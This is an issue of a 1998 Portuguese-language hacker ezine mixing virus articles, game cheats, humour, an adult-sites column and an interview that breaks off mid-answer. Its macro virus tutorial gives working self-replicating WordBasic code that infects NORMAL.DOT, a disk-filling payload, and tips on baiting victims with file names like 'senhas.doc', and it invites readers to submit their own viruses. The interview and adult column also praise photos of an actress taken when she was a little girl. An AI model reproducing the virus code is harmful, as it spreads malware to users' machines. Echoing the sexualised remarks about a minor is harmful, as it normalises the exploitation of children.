\ / | | |__ __ | | | ___ | | | ____ \ / | | _) | | | | | | | | \ / | | _/ | | | | ___ | | |____ / | | \ | | | | | | | | / |_ |_ \_ |_ |______ |_ |_ |______ |_ |______ [v i r t u a l i s] Ano 1 - Número 2 - Maio/1998 Editor responsável - Dr Herman Versão digital ==================================================================== "O perigo não é que os computadores começarão a pensar como os homens mas sim, que os homens começarão a pensar como os computadores." Sydney J. Harris ==================================================================== [Índice] Editorial .......................................................... Ezines nacionais ................................................... H/P/V/A/C......................................................Virus Anatomia de um vírus de macro Top Ten Virus Sexus............................................................... Gamez ............................................ PC como videogame Dicas para PlayStation Libertas ............................................... Legalize já Risus............................................................... Entrevista ............................................... Dr Herman Por aí.............Garoto pernambucano invade arquivos do governador Microsoft se alia a Sega na guerra dos videogames Missivas............................................................ Como conseguir as próximas edições da Virtualis..................... Desclassificados.................................................... EOF ................................................................ Colaboraram nesta edição: Fábio Câmara, IpSiS, NetRunner, Pulse, X-Girl ==================================================================== [Editorial] Saudações ! Aqui estou novamente. Pensaram que tinha desistido ... No way !!!!! Bom, são quase 7 meses desde a primeira edição. Desde então, muita coisa mudou. Teve o lance de me descobrirem usando a senha de outro usuário para acessar a Rede. Estou completamente sem acesso a Rede (na verdade fui proibido, e se me pegarem conectado, estou morto). Vou ter que ir num desse malditos cibercafés da vida para poder disponibilizar esta nova edição para vocês. Em decorrência disso, o esquema de assinaturas via e-mail está suspenso até que eu esteja conectado novamente. Outra coisa importante, estou disponibilizando a nossa Virtualis via correio normal ("snail mail") em papel ou disquete. Assim, todo mundo poderá ter acesso a esta publicação. Infelizmente, isso tem um custo - R$2,00. Quem sabe se um dia arranjar patrocinadores o preço possa baixar. * * * Vamos falar um pouco sobre esta edição. O assunto dominante é vírus. Tem um pouco para todos - dos novatos aos veteranos. Faço uma análise bem rápida sobre os kits de construção de vírus. Os puristas podem dizer que isso é coisa de "lammer". Mas os kits são uma boa fonte para quem está a fim de aprender a "arte" de se criar vírus. Tenho a maioria dos kits e estava querendo disponibilizá-los na Rede. Quem sabe um dia ... Temos também um tutorial sobre vírus de macro em Word. Bem simples mas dá para pegar o jeito da coisa. Bom, chega de papo. Boa leitura e até a próxima. Dr Herman ==================================================================== [Ezines nacionais] Dr Herman Aproveitando a deixa, fiz uma uma breve análise dos zines que tive acesso na época que tinha acesso a Rede. Alguns zines são bastante interessantes enquanto outros são uma porcaria. Não basta sair "chupando" artigos de outros zines e colocar no seu. Acho ridículo um carinha montar um zine só com matérias "chupadas" dos outros. Alguns ainda assinam em baixo como se fossem o autor. Barata Elétrica (BE) Este é o zine mais antigo que conheco. Tive acesso até o número 16. Escrito por Derneval Ribeiro Rodrigues da Cunha, um ex-estudante da USP que, por incrível que pareça, estudava letras. Aborda temas como hacking, phreaking, segurança e outros temas do "computer underground". Não se aprofunda em questões práticas, ou seja, não ensina a pescar e nem dá o peixe. O máximo que faz é citar algumas técnicas utilizadas pelos hackers. Não espere encontrar um tutoriais sobre como quebrar senhas ou como enviar fake-mails. Um dos objeti- vos do cara com o BE é conscientizar os wanna-bÉs. Leitura (quase) obrigatória para quem está começando. O que cansa é as ego-trips que o cara dá de vez em quando. FORMATO: ASCII puro DESDE: 3 de dezembro de 1994 Rato.br Escrito por Tesso Martins Costa (Cyberboy) de Uberlândia-MG.Me senti lendo um número antigo do BE. Acho que se o cara está querendo apa- recer, deveria fazer outra coisa. Não perca tempo com este zine. Coisa de wanna-be e lammer. FORMATO: .DOC (MS WORD) DESDE: 26/01/97 CYBERNETiK ZiNE Escrito por ]nOfAcE[, sua primeira edição (edição primer) não foge muito ao padrão de outros zines hackers. Se não fossem por umas ma- térias como ZIP BOMB e outra com o código de um TROJAN HORSE, diria que este é apenas mais um zine hacker na praça. No mais, acho melhor aguardar um pouco e ver se pinta outra edição. FORMATO: ASCII e HTML(?) DESDE : Fev/97 TechnoOráculo Editado por Daniel Braga S. dos Santos, este zine traz algumas aná- lises de softwares, dicas de sites, tutoriais e uma sessão de OS2. Nada muito pesado. Possui matérias interessantes. Numa edição passa- da, foi publicado um artigo que ensinava a caçar o autor de um mail- bomb. Muito bem escrito e mesmo nao sendo um zine underground, mere- ce ser lido. FORMATO: ASCII e HTML DESDE: Fev/97 Bom, não sei exatamente como está a cena no momento pois já estou afastado há algum tempo da Rede. Quem estiver editando algum zine que não foi citado aqui e quiser enviar uma cópia para que possa dar uma olhada, sinta-se a vontade. ==================================================================== [Vírus] Dr Herman Por mais que o assunto parece "batido", sempre existirão usuários que ignoram complemente o assunto. Perguntas como - "se eu tocar num disquete infectado com um vírus, eu posso ficar doente ?" - por mais ridículas que pareçam ainda são ouvidas. Por que isso ? A ignorância leva ao medo. O assunto é simples mas, as pessoas que o desconhecem criam suas próprias "verdades" sobre o assunto. O que era uma dúvi- da, uma suspeita, torna-se "verdade" da noite para o dia. E esta mesma "verdade" toma proporções tão imensas que parece impossível que não seja verdadeira. Veja as malditas correntes que viajam a Rede -- "Good Times" e a mais nova, "Join the crew". Se as pessoas soubessem o que é um vírus, como ele age, as formas de infecção, os danos, as vacinas, certamente boatos como estes não tomariam vida. Acompanhe-me nesta jornada e descubra o fascinante mundo dos vírus de computador. Veremos o que é um vírus, um pouco de sua historia, quem são as pessoas por trás deles, e até alguns exemplos dissecados. Bom, chega de conversa. Vamos tentar desmisitifar um pouco o assunto. Por definição, um vírus de computador é um programa que "infecta" outros programas, modificando-os para incluir uma copia de si pró- prio. Um vírus não precisa causar dados; o ato de "infectar" outros programas é que define um vírus. Existem três classes de vírus -- vírus de arquivo, vírus de boot e o mais novo e popular vírus de macro. Os vírus de arquivos geralmen- te infectam arquivos de programas (.COM, .EXE). Eles podem ser clas- sificados ainda em RESIDENTES e DIRETOS. Os diretos selecionam um ou mais programas para infectar todas vez que o programa hospedeiro (aquele que foi infectado pelo vírus) é executado. São conhecidos também como não-residentes. Os residentes instalam-se na memória assim que o programa hospedeiro é executado e infecta outros programas quando são executados ou quando condições são preenchidas. A maioria dos vírus se enquadram nessa categoria. A segunda categoria são vírus boot ou vírus de sistema. Estes infectam o código executável que se encontra em certas áreas de um disco. Todos estes vírus são residentes. A terceira categoria (e a mais recente) são os vírus de macro. Estes infectam documentos que possuem um mecanismo de macro-comandos semelhantes aos do Microsoft Word (Wordbasic). São tão destrutivos quanto os outros tipos podendo formatar seu disco, encriptar seus documentos, etc. Os hoaxes são boatos espalhados pela Rede sobre vírus que não existem. Alguns se propõem a fazer coisas impossíveis como, desde apagar seu HD, queimar seu monitor, até botar fogo em sua casa ! Geralmente são "correntes" que são distribuídas e que dizem coisas como: "Se você receber um mail com o subject: TIO BARNABÉ CHEGOU ! não abra, isto é um vírus altamente perigoso que pode (...). Não existe vacina e ele não é detectado por nenhum antivírus (mesmo porque não é um vírus). ==================================================================== [Kits de criação de vírus] Os Kits de Construção de Vírus (KCV) são programas que permitem a criação de vírus por pessoas com pouco ou nenhum conhecimento de programação. Dois métodos são usados neste kits. O primeiro usa uma interface com menus onde o usuário "desenha" o vírus, indicando o método de repli- cação, o critério de infecção e o "payload" (o que o vírus faz quan- do é ativado). O segundo método usa um arquivo texto onde as confi- gurações do vírus são colocadas. Este arquivo é usado por um "gera- dor" de código para produzir o vírus. Um importante fator a ser considerado - os kits de primeira geração apenas produzem vírus compilados sem gerar o código fonte. Os kits de segunda geração produzem o código fonte do vírus (as vezes até comentado) que pode ser mudado e compilado pelo usuário. O perigo nos kits de segunda geração é que alguém com um conhecimento bem limitado de programação potencialmente pode produzir um novo vírus sem conhecer nada sobre o funcionamento interno de um vírus. Vale salientar que estes kits geram vírus com uma boa parte do códi- go igual. Assim, os antivírus podem detectar facilmente qualquer vírus implementado com este método. Entretanto, os futuros kits deverão usar técnicas de mutação. Vejamos alguns kits: GENVIR Este foi a primeira tentativa de se lançar um kit comercial. É um kit de primeira geração com uma interface baseada em menus. Foi escrito na França em 1990 por J. Struss. É um "shareware" que mostra todas as etapas da criação de um vírus, mas para quando se chega perto do estágio de geração de código. Para receber uma cópia funcional, deve-se licenciar o software por uma taxa de 120 francos. A última versão conhecida é a 1.0. VCS (Vírus Construction Set) VCS e um kit de primeira geração escrito em 1991 por um grupo alemão chamado VDV (Verband Deutscher Virenliebhaber). VCS é um programa primitivo que requer um arquivo texto de no máximo 512 bytes. Ele incorpora este texto com a parte funcional do vírus e gera um arquivo .COM. Após um numero específico de replicações, o vírus mostra a mensagem que foi especificada e deleta o AUTOEXEC.BAT e CONFIG.SYS. O programa foi escrito em alemão mas existe uma versão "crackeada" em inglês. VCL (Vírus Construction Laboratory) VCL é um kit de segunda geração bem complexo escrito em 1992 por Nowhere Man e [NuKE] Warez. Permite que vários módulos sejam incorporados em um vírus além de gerar o código fonte em assembly comentado. PS-MPC (Phalcon / Skism - Mass Produced Code Generator) PS-MPC é um kit de segunda geração escrito por Dark Angel em julho de 1992. É baseado descaradamente no VCL. É distribuído com o código fonte escrito em C. Apesar de não ser baseado em menu, ele cria um código em ASM menor e melhor comentado do que o gerado pelo VCL. IVP (Instant Vírus Production Kit) IVP é um kit de segunda geração, escrito em 1992 por Admiral Bailey, um membro da grupo "underground" YAM (Youngster Against McAfee - Jovens contra McAfee). De acordo com sua documentação, foi escrito em Turbo Pascal 7.0. IVP usa um arquivo com configurações e produz código fonte comentado. Possui as seguintes características: infecta .EXE e .COM; suporte a "Trojan horse" mudança de diretório encriptação tratamento de erros infecta o arquivo COMMAND.COM opção de sobrescrever gerador randômico da instrução NOP G2 (G ao quadrado) G2 é um kit de segunda geração escrito em 1993 por Dark Angel do grupo Phalcon/Skism (ele também é autor do PS-MPC). Este kit utiliza o método do arquivo de configuração e produz código fonte comentado. De acordo com Dark Angel, G2 não é uma modificação do PS-MPC, mas sim um programa totalmente novo. Ele se diferencia dos outros por produzir rotinas facilmente alteráveis e semi-polimórficas. ==================================================================== [Anatomia de um vírus de macro] Ouvi em um programa de rádio que a cada dia são descobertos cerca de 10 a 15 vírus de macro. Por que está praga se espalha tão rapidamente ? Bom, a linguagem é bem simples: BASIC (WordBasic para ser mais exato). Acho que isso já diz quase tudo. Ok, vamos iniciar a dissecação de uma vírus de macro que ataca o do- cumentos do Microsoft Word. Primeiro vamos introduzir alguns conceitos: Macro: é uma seqüência de comandos e instruções do Word que você agrupa como um único comando para executar uma tarefa automatica- mente. O Word possui algumas macros padrão. Estas macros são executadas au- tomaticamente quando ocorre um determinado evento. Macro Executada quando --------------------------------------- AutoExec você executa o Word AutoNew você cria um novo documento AutoOpen você abre um documento AutoClose você fecha um documento AutoExit você fecha o Word O vírus de macro infecta o Word, mais especificamente o modelo global chamado NORMAL.DOT. Uma vez que o Word está infectado, todos os docu- mentos abertos por ele, são infectados. Assim, se um documento infec- tado for aberto em outro micro com o Word não infectado, ele o infec- tará. 1. Mecanismo de infecção (ou como essa peste faz para se espalhar): Primeiro, é necessário criar um documento hospedeiro, isto é, aquele que carrega o primeiro vírus e se encarrega de espalhá-lo. Crie um arquivo com um nome chamativo - senhas.doc, password.doc, topsecret.doc, etc. Um bom nome pode ser decisivo na liberação de um vírus de macro. Crie um macro chamado AutoClose. Vá até o menu Ferramentas/Macros... e copie o seguinte código: ------------------------------>8------------------------------------- 'conta os macros do NORMAL.DOT totMacro = ContarMacros(0) infectado = 0 'verifica se NORMAL.DOT foi infectado If totMacro > 0 Then For i = 1 To totMacro If NomeMacro$(i, 0) = "AutoClose" Then infectado = 1 End If Next End If sDoc$ = NomeJanela$() + ":AutoClose" 'infecta NORMAL.DOT If infectado <> 1 Then MacroCopiar sDoc$, "Global:AutoClose" Else infectado = 0 'verifica se documento já estava infectado If ContarMacros(1) <> 0 Then infectado = 1 End If 'documento não estava infectado, 'infecta-o copiando-o como .DOT If infectado = 0 Then ArquivoSalvarComo .Formato = 1 MacroCopiar "Global:AutoClose", sDoc$ End If End If ------------------------------8<------------------------------------- Ok, este código é o responsável por infectar o modelo NORMAL.DOT que por sua vez infectará todo arquivo aberto ou criado no Word quando for fechado. 2. Payloads (ou a identidade de um vírus): Para quem não sabe, payload é a alma de um vírus, ou seja, o que ele realmente faz. Neste ponto, a sua criatividade corre solta. Você pode detonar com o sistema ou apenas ficar enchendo o saco do usuário de vez em quando. Eu classificaria os payloads nas seguintes categorias: não destrutivos: mostram uma mensagens em função de algum evento (data); atormentantes: ficam apagando palavras, imprimindo seu documento a toda hora, etc.; destrutivos: apagam arquivos, formatam o HD, etc. Segue abaixo um exemplo de um payload que faz o seguinte - toda vez que um documento infectado for fechado, ele copiará o arquivo Autoexec.bat para o diretório de gravação default de documento (c:\Meus Documentos, na maioria dos casos) com um nome baseado no dia e segundos. Com o tempo, estes arquivos ocuparão um espaço significativo no disco. E na melhor das hipóteses, o usuário terá que deletar todos os arquivos sempre que usar o Mikosoft Rword. ------------------------------>8------------------------------------- '---- PAYLOAD For i = 1 To 20 sArq$ = DefaultDir$(0) + "\" + Str$(Segundo(Agora())) + Str$(Dia(Agora()))+Str$(i)+".doc" CopiarArquivo "c:\autoexec.bat", sArq$ Next ------------------------------8<------------------------------------- OBS: a linhas ... sArq$ ... e Str$ ... são uma só. 3. Antídoto (ou como tirar esta merda de vírus do meu sistema): É bem simples - basta retirar a macro AutoClose de todos os documen- tos infectados. Primeiro, é necessário retirar do modelo global NORMAL.DOT. Depois, basta abrir todos os seus documentos .DOC e veri- ficar se estão infectados (verificar se a macro AutoClose está pre- sente). Se estiver, basta excluir a macro. Vale a pena lembrar que a partir da versão 97, o Word possui um aler- ta automático que avisa se um documento possui uma das macros automá- ticas e dá a opção do usuário desabilitar as macros contidas neste do- cumento. Mesmo assim, acho que são poucas as pessoas que utilizam a versão 97 deste produto. Bem, mão na massa moçada. Publicarei a partir da próxima edição os vírus de macro mais legais que receber. Envie o seu, se for bom eu o publicarei. ==================================================================== [Top Ten Virus] Os dez vírus mais comuns no mundo todo. 1 Form.A 2 WM.Concept.A 3 AntiEXE.A 4 One Half 5 Stoned.Empire.Monkey.B 6 Junkie 7 AntiCMOS.A 8 Parity Boot.B 9 Natas.4744 10 NYB Vale a pena salientar que o segundo lugar é ocupado por um vírus de macro do Word. Fonte: Symantec AntiVirus Research Center (SARC) ==================================================================== [Sexus] Dr Herman Este site é muito legal. Aqui você encontra várias celebridades do cinema e da televisão (americanas) em montagens de várias cenas de seus filmes. As fotos estão divididas em 3 categorias: nenhuma nudez e poses sensuais; nudez parcial ou poses sensuais; nudez total. Várias fotos com atrizes famosas como Demi Moore, Darryl Hannah, Alicia Silverstone. Vale a pena deixar claro que esta "montagens" não são "fake montages" (montagens se tem o rosto de uma pessoa no corpo de outra – há várias fotos da Sandra Bullock, Alicia Silverstone, e outras espalhadas pela Rede). O site é atualizado constantemente e é um muito bem desenhado. Existe a possibilidade também de se acessar as imagens via FTP. Vale a pena colocá-lo no seu bookmark. http://www.keg.com/dai/ OBS: a última vez que acessei o site, ele estava em manutenção. Espero que não tenha mudado a URL. No final deste arquivo, segue uma foto (uuencodada) da "Loira do Tchan" no começo da carreira. Está dançando a dança da garrafa do jeito que você nunca viu. Dica: Para decodificar a foto, recorte a parte o trecho abaixo desde a linha com begin até o end e cole num arquivo. Salve este ar- quivo como carla.uue. Se você tem o Winzip, basta dar um double- click no mesmo e voilà. Quem não tem o Winzip, pode utilizar o comando uudecode do Unix ou procurar este programinha na Web. ==================================================================== [Gamez] Dr Herman O PC como videogame Viver num país que possui as mais altas taxas de juros não é fácil. Para sanar algumas dívidas, me desfiz da minha máquina – um Pentium 100. Com o coração apertado, "queimei" uns 3 CDs com tudo que havia criado e arranjado – sistemas, programas, artigos técnicos, vírus, zines e fotos. Com problemas no banco e sem grana para comprar ou- tro, comecei a me interessar novamente por um videogame. Após pes- quisar um pouco descobri que os dois consoles mais fortes no mercado brasileiro eram o PlayStation (Sony) e o Nintendo 64 (Nintendo). O primeiro possui tecnologia de 32 bits; o segundo, 64. O preço dos dois são basicamente o mesmo – por volta de R$ 240,00 no mercado pa- ralelo. Detalhe – o PlayStation só utiliza cd-rom, enquanto que o outro (por enquanto) utiliza somente cartucho. Tecnicamente, o Nin- tendo 64 tem maior poder de fogo que o PlayStation (64 x 32 bits !). Tecnicamente, pois na prática os jogos para o PlayStation não ficam devendo em nada para os do Nintendo 64. O grande diferencial se faz na hora de comprar um jogo – enquanto você gasta de R$5,00 a R$8,00 num jogo para o console da Sony, você gastará de R$ 50,00 a R$ 80,00 num cartucho para o Nintendo (preços do mercado paralelo). Isso sem contar que o PlayStation possui cerca de 300 títulos enquanto o N64 possuí bem menos. Não preciso dizer que optei pelo console da Sony. Talvez a situação se inverta com o lançamento do módulo de cd para o Nintendo 64 prometido até o final do ano. Fiquei bobo com a qualidade dos gráficos, a velocidade e o som apre- sentado nos jogos. Não tinha visto nada igual no PC. E olha que eu gostava de passar umas horas jogando no micro. Resumindo, se você quer ter um micro em casa, pense bem antes de sair torrando mais de R$2000,00 num Pentium "sei-lá-o-que". Depen- dendo do que você vai fazer, um 486 parrudinho dá conta do recado. Veja - um "videogame" é um computador especializado em jogos com todo o seu hardware projetado para isso. Já um PC é um computador de uso genérico, e para jogos precisa de um dispendioso "upgrade" com placas de vídeo, joysticks, memória, disco, drive de cd-rom, etc., para que possa apresentar um jogo com a mesma qualidade de um video- game. -------------------------------------------------------------------- Dicas para PlayStation Pulse Pandemonium! 2 Abrir todas as fases: GETACCES Energia total: HORMONES Vidas infinitas: IMMORTAL Arma eterna: MAKMTDAY Invencibilidade: NEVERDIE Mutant Mode: GENETICS Camera Roll: GONAHURL Monstros que ressucitam: JUSTKIDN Texturas diferentes nas fases: ACIDDUDE One Todas as armas: MAXPOWER Seleção de fase: HEVYFEET Courier Crisis Senhas das fases: 1 eflcifcgkj 6 flclficcil 11 cflcifcoij 2 iflcifccki 7 fpclfiocjl 12 gflcifckij 3 mflcifcokj 8 fdclfikcjl 13 ffclfigccj 4 aflcifckkj 9 kflcifcgii 14 fjclficcij 5 fhclfigcjl 10 oflcifccii 15 fnclfiocjj ==================================================================== [LiBeRtAs] Fábio Câmara Esta nova seção tratara' se assuntos referentes a liberdade de expressão. Para esta edição recebi a colaboração do leitor Fábio Câmara. Ele discute a polemica prisão do grupo de rock "Planet Hemp" (Planeta Maconha, ou cânhamo, como preferiu a "Grobo"). Para quem ano conhece, o grupo É famoso por defender a legalização da maconha na sua letras. FOMOS INVADIDOS PELA MAIS RECENTE POLÊMICA GLOBAL, A LIBERDADE DE EXPRESSÃO EM LETRAS DE MÚSICAS. ORA, ANALISEMOS FRIAMENTE, A REDE GLOBO QUANDO ESTA SEM ASSUNTO PARA SEUS TELEJORNAIS ATIRA FALSAS POLÊMICAS PARA TODOS OS LADOS, ESTE ASSUNTO EM PARTICULAR É MAIS ANTIGO QUE ... BEM, DEIXA EU PENSAR, TIRANDO AS MÚSICAS RECENTES DE BANDAS ALTERNATIVAS, TIVEMOS O BEZERRA DA SILVA, ANTES TIVEMOS LEILA DINIZ, MOVIMENTO DA TROPICÁLIA, NOVOS BAIANOS, JONH LENNON E YOKO ONO, WOODSTOCK ( ERA PAZ, AMOR, SEXO E DROGAS PARA TODO O LADO QUE SE OLHASSE), TENHO AINDA ALGUNS EXEMPLOS, MAS O MAIS AN- TIGO TALVEZ SEJA QUE LOGO APOS O DILÚVIO, NA ÉPOCA DE NOÉ (BÍBLIA SAGRADA), A POMBA CARREGAVA NO BICO UMA FOLHA DE CANNABIS SATIVA... NÃO QUERO AQUI DEFENDER O MOTIVO DOS VOTOS DO GABEIRA, NEM O MOTI- VO DAS VENDAS DOS DISCOS DO PLANET HEMP, QUERO SÓ CRITICAR QUE NOSSOS ARTITAS EXILADOS, FUGIRAM POR CAUSA DAS OPINIÕES POLÍTICAS E NÃO POR CAUSA DA 'ERVA', QUE NINGUÉM NA HISTÓRIA PÚBLICA DO BRA- SIL FOI PRESO PELO SIMPLES FATO DE CANTAR 'VOU APERTAR, MAIS NÃO VOU ACENDER AGORA...' E QUE SE ISSO COMEÇAR A VIRAR MODA, COLOQUEM NO XADREZ ROBERTO CARLOS QUE CANTAVA 'A MAIS DE 300 NA ESTRADA DE SANTOS...', PRENDAM O AUTOR DA MÚSICA 'RONDA' ONDE EM DETERMINADO TRECHO, ANUNCIASSE UM ASSASSINATO, OU COLOQUE-SE CONFORMADO EM FRENTE A UMA EMISSORA DE TV QUE ATRAVÉS DE POSIÇÕES RIDÍCULAS VISA SOMENTE GERAR POLÊMICAS PARA MANTER AUDIÊNCIA. FÁBIO CAMARA FABIOCAMARA@INTERPLANET.COM.BR ==================================================================== [Risus] Ninguém é de ferro. Depois de tanto trabalho com esta segunda edição, resolvi colocar uma seção de humor neste ezine. Você en- contrara' aqui boas piadas. As fontes são várias - listas de discussão, revistas, etc. Ano citarei autores - as piadas são de domínio publico, dificilmente você encontrará o verdadeiro au- tor de uma boa piada ( mas que eles existe, ah, existem !). Ape- sar de ser um cara com senso de humor, dificilmente, você verá uma piada minha nesta seção. É pau, É bug É o fim do programa É um erro fatal O começo do drama É o Turbo Pascal Diz que falta um begin Ano me mostra aonde, E capota no fim É dois, É três É quatro-oito-meia Instrução ilegal QEMM bloqueia É o erro no boot É um disco mordido Hard disk estragado Ai meu Deus to fudido São as barras de espaço Exibindo um borrão É a promessa de vídeo Voando pro chão É o computador Me fazendo de otário Ano compila o programa Salva só comentário É ping, É pong O meu micro reboota O scan ano retira Vírus filho da puta O Windows ano entra Nem Volta pro DOS Ano funciona Reset Detona a CMOS Abort, Retry Disco mal-formatado PCTools ano resolve Norton trava o teclado É a impressora sem fita Engolindo o papel Meu trabalho moído Cuspido pro céu São as aulas de marco Mostrando o que são As promessas de micros Da computação ----------------------------------------------------------------- O carro modelo 98 só estaria 'a venda no final de 99. Toda vez que a Prefeitura repintar as faixas divisórias das ruas você teria que comprar um modelo novo de carro. O motor morreria de vez em quando e você teria que fechar todas as janelas, descer e religar o carro. Por algum motivo estranho você aceitaria isto sem muita reclamação, e acharia atÉ normal. Estranhamente, dirigir em certo bairro ou andar a certa veloci- dade também faria o motor morrer, e você também teria que fechar todas as janelas, descer e religar o carro. Por algum motivo es- tranho você também acharia isto normal. Muitas vezes o carro não restartaria corretamente, e você teria que remover o motor, fazer nada com ele, e colocar de volta. Ai' geralmente funciona, mas ninguém saberá' explicar porque. Você não poderia transportar outras pessoas no seu carro a menos que você comprasse o modelo "Carro 95" ou "Carro NT". Mas ai' teria que comprar assentos adicionais. A Sun Motor Systems faria um carro movido a energia solar, duas vezes mais confiável e cinco vezes mais rápido, mas ele só tra- fegaria em 5% das ruas. A Apple Motor Inc. faria um carro um pouco mais rápido, um pouco mais fácil de dirigir e apenas um pouco mais caro, mas que malu- co compraria um carro que só tem 5% do mercado ? As luzinhas de óleo, alternador, o medidor de gasolina, etc., se- riam substituídas por um único LED chamado "General Car Fault", que poderia acender mesmo quando o óleo, alternador, gasolina e motor deveriam estar OK. Quando acender você terá' que desligar, descer do carro e religá-lo. A Microsoft não fabricaria os motores mas faria um convênio com uma fabrica especializada. O motor teria 16 válvulas por cilin- dro com injeção multiponto mas por razoes de compatibilidade u- tilizaria o cambio e carburador do Fusca. Haveria um "Motor Pro" com turbinagem mas que, por algum motivo, seria mais lento que o motor normal em quase todas as estradas. O "Motor MMX" teria um toca-discos embutido mas que só funcio- naria em ponto-morto. Os usuários e a imprensa fariam um grande circo sobre as "novi- dades" dos carros Microsoft, mesmo que estas "novidades" já' venham sendo usadas por outros carros ha' anos e anos. Nos só poderíamos comprar gasolina Microsoft e óleo Microsoft. O governo ganharia subsídios dos fabricantes de carros, em vez de pagar-lhes subsídios. Os assentos novos assumiriam que todos os passageiros tem a bun- da do mesmo tamanho, resultando num "boom" da cirurgia plástica. O sistema de "air bag", antes de disparar, perguntaria "Você tem certeza?" O volante seria substituído por um mouse, e você teria que deco- rar um código tipo "control-alt-click botão direito" para frear. O motor precisaria de um drive interno de 1GB e levara' em media 10 minutos para o "boot". Se uma porta do carro estiver aberta ele iria parar e perguntar "Abort, Retry, Fail?" Você teria que fazer uma revisão completa a cada 512 km. Você teria que examinar o carro detidamente para ver se ha' al- gum vírus antes de ir a qualquer lugar. Antes de ir ao centro da cidade você teria que contratar um con- sultor especializado para reconfigurar sua suspensão. O velocímetro indicaria 133 mesmo se você estiver a 80. O velo- címetro indicaria MHz em vez de km/h, e embora ninguém saiba quantos MHz eqüivalem a um km/h, todo motorista ficara' orgulho- so do MHz máximo do seu velocímetro. A Microsoft faria um modelo esportivo conversível, que fundiria o motor logo se levante a capota. Cada vez que você transportasse um novo passageiro, o carro te- ria que ser reconfigurado. Depois que o passageiro descer, as configurações continuariam alteradas. Depois de transportar 16 passageiros o carro ficaria confuso e você teria que reinstalar o motor. ==================================================================== [Entrevista] A entrevista abaixo foi feita por um "amigo" virtual que conheci via email. O nick da figura é IpSiS. Foi feita via IRC. Não me lembro exatamente da data mas foi logo após o lançamento da V1 e um pouco antes que eu perdesse o acesso a Rede. Não sabia se publicaria isso, sei lá, não curto isso de auto-cultua- ção. Acabei decidindo publicar para vocês conhecerem um pouco mais da estória e pouparia o tempo que seria gasto em responder a estas perguntas novamente. * * * IpSiS: Virtualis BBS - ainda um sonho ? Dr Herman: Infelizmente a resposta ainda é sim. I: Por que uma BBS em tempos de Internet? Você já tem um site na Rede. H: Penso em montar uma BBS porque não posso colocar tudo que tenho nos meus "baus" na Rede. Seria algo meio irresponsável. Qualquer um (quase) hoje pode caçar informações na Rede facilmente. O que aprendi e coletei nesses tempos não são para qualquer um. Não posso sair ensinando a garotos de 12 anos como fazer napalm ou como cultivar cannabis no quarto. I: Isso está me cheirando a censura ... H: Você pode pensar dessa maneira, mas a verdade é que não poderia dormir sossegado ao saber que "garotos que fizeram uma bomba caseira com receita encontrada na Internet no site da revista Virtualis, morrem ...". Já pensou nisso? Quando eu colocar minha BBS no ar, só terá acesso pessoas qualificadas a lidarem com essas informações. Sei fazer TNT, nitroglicerina, explosivo plástico, ligações gratuitas em telefones públicos, como tornar a vida de uma pessoa um inferno a ponto dela cometer suicídio, mas nem por isso sou um terrorista, um assasino, ou um ladrão. Não vivo disso. Tenho família, emprego, dívidas, como um de vocês. Tenho que zelar pelo que sei. Também não posso sair distribuindo receitinhas de tudo que sei. Não achei meu conhecimento no lixo. I: All right ! Vamos falar do ezine. Como surgiu a idéia de escrever um ezine hacker ? H: Bom, primeiro uma correção - a Virtualis não é um ezine hacker. Você leu o número um. Você sabe disso. Quando resolvi fazê-lo pensei em fazer algo que me desse prazer. Não me considero um hacker, daqueles que são capazes de entrar em qualquer servidor plugado na Rede ou hackear o site do FBI. Gosto muito de escafunçar nas coisas, já quebrei algumas senhas de um servidor Unix, já enviei fake mails via telnet, mas não sou dos melhores, já não tenho tempo para fazer estas coisas, sou casado, com filho. Virtualis seria algo como um ezine underground com assuntos diversos, entre os quais, hacking. Lá você poderá encontrar desde discussões sobre segurança em Unix, NT, como letras de músicas de bandas como Cure, Siouxsie. O que me motivou a escrever foi o ezine Barata Elétrica. Não o ezine em si, mas a atitude do cara. I: Oh, no ! I can't believe it ... Aquele cara é um chato ! Você o conhece ? Sabe o quanto é chato ? H: :) Não conheco o Denerval. Apenas li o que escreveu.Tem coisa legal como ética, artigos colhidos em outros ezines, e coisas sem importância também. Assim são todas as publicações. Os leitores são heterogênios - nem todos gostam de mulatas, alguns gostam de loiras ... Olhe a Virtualis 1 ! Cara, achei aquilo uma droga. Poderia ter feito muito melhor. Mas sei que se fosse ficar buscando a forma perfeita, nunca sairia do papel, ou melhor, do meu micro. I: O que você tem lido ? H: Olha, de tudo um pouco, procuro não ficar muito alienado. Escuto a rádio CBN para me informar, compro o jornal três vezes por semana, leio revistas sobre Internet, atualmente a Internet World e Internet .BR. As vezes, leio a Veja e a Istoé. Da Rede, leio Barata, Axur5, Techoráculo, Phrack, UXU e outros artigos que espalhados por aí. I: E sobre a seção SeXuS ? Achei que poderia ficar bem melhor, tenho uns endereços da hora... H: SeXuS é uma seção que achei que deveria estar presente. Quem não passou algumas horas procurando alguns sites com fotos de modelos ou mesmo aqueles bem x-rated ? Não vou colocar endereços como a Gostosa. Acho o site bem feito mais o conteúdo... O carinha passa a coletar tudo quanto é foto de mulher com a perna aberta na Rede e colocar (de novo) em um novo endereço. Acho muito pouco original. Acho legal aqueles sites sobre uma atriz/modelo com fotos e outras informações. Estes dias vi um da Piovani. Excelente ! O cara colocou fotos difíceis - do tempo em que ela era uma menininha. Provavelmente o sortudo acabou conhecendo-a pessoalmente. Pretendo colocar a SeXuS na Rede com uma seção mensal com algumas figurinhas da minha coleção particular. A primeira vai ser a Rainha dos Baixinhos. I: Cool ! I just can't wait for this... Você tem planos em lançar a Virtualis em papel ? H: Não. Até que gostaria de vê-la em papel. Mas o trampo que isso dá. Não dá para imprimir a versão eletrônica e sair distribuindo. Precisa de ter um mínimo de diagramação. Depois, haja papel ! E a distribuição ! Não, não tenho tempo para isso. Não tenho ninguém coletando, digitando e distribuindo a Virtualis comigo. Talvez algum dia. I: Como pode se conseguir a Virtualis ? H: Na web através da URL http://www.ciclone.terravista.com.br/Ipanema/ ou via email para virtualis@yahoo.com. Estou batalhando para conseguir um espaço em algum site ftp. Parece que vou conseguir um na EFF. Se algum sem-rede estiver interessado em recebê-la em papel, entre em contato pelo endereço Virtualis Caixa Postal 189 Guaxupé - MG 37800-000 I: Mas você não disse que não trabalharia com papel ? H: Veja, estou apenas querendo quebrar um galho para quem não tem acesso a Internet. É diferente de uma distribuição em larga escala. É claro que vou ter que cobrar por isso - pelo menos o material. I: Seu nome verdadeiro é Herman ? H: Não. Meu nome verdadeiro é ######### ########. Acho que quem fala demais acaba no "bico do corvo" mais cedo do que deveria. Daí o uso do pseudônimo. I: Você já foi ameaçado de alguma forma ? H: De 